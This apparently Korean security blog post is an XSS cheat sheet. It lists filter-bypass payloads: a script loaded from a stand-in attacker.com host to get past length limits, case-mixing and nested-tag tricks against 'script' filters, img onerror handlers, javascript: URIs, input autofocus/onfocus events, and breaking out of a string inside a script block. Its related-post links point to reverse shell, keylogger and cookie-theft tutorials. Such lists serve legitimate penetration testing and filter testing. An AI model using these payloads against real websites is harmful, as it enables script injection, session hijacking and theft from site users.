1. 글자 길이 제한 우회
<script src="http://attacker.com/xss.js"><script>
2. script 문자열 필터링
<scrscriptipt>alert(1)</scrscriptipt>
<sCrIpT>alert(1)</sCrIpT>/
3. <img> 태그
[*] 스크립트 태그 사용 불가능 시
<img src=x onerror="alert(1)">
4. <a> 태그
<a href="javascript:alert(1)">XSS</a>더보기
[*] 주소창에서 자바스크립트 동작시키는 방법
javascript:alert(1)
5. <input> 태그
<, > 특수문자 사용 불가능 시
<input type="text" value="__">
<input type="text" value="dummy" autofocus onfocus="alert(1)">
<input type="text" autofocus onfocus="alert(1)">
6. 사용자의 입력 값이 <script> 태그 안에 들어가는 경우
<script>
var data = "___";
</script>
<script>
var data = "
"alert(1);var a = "
";
</script>'Web > Attack' 카테고리의 다른 글
| 리버스 쉘(Reverse Shell) 실습(with netcat) (3) | 2024.07.21 |
|---|---|
| DOM 객체 접근(with JavaScript) (0) | 2024.06.29 |
| Useful JavaScript (0) | 2024.06.29 |
| KeyLogger 만들기(with JavaScript) (1) | 2024.05.14 |
| 쿠키 탈취(with JavaScript) (0) | 2024.05.13 |
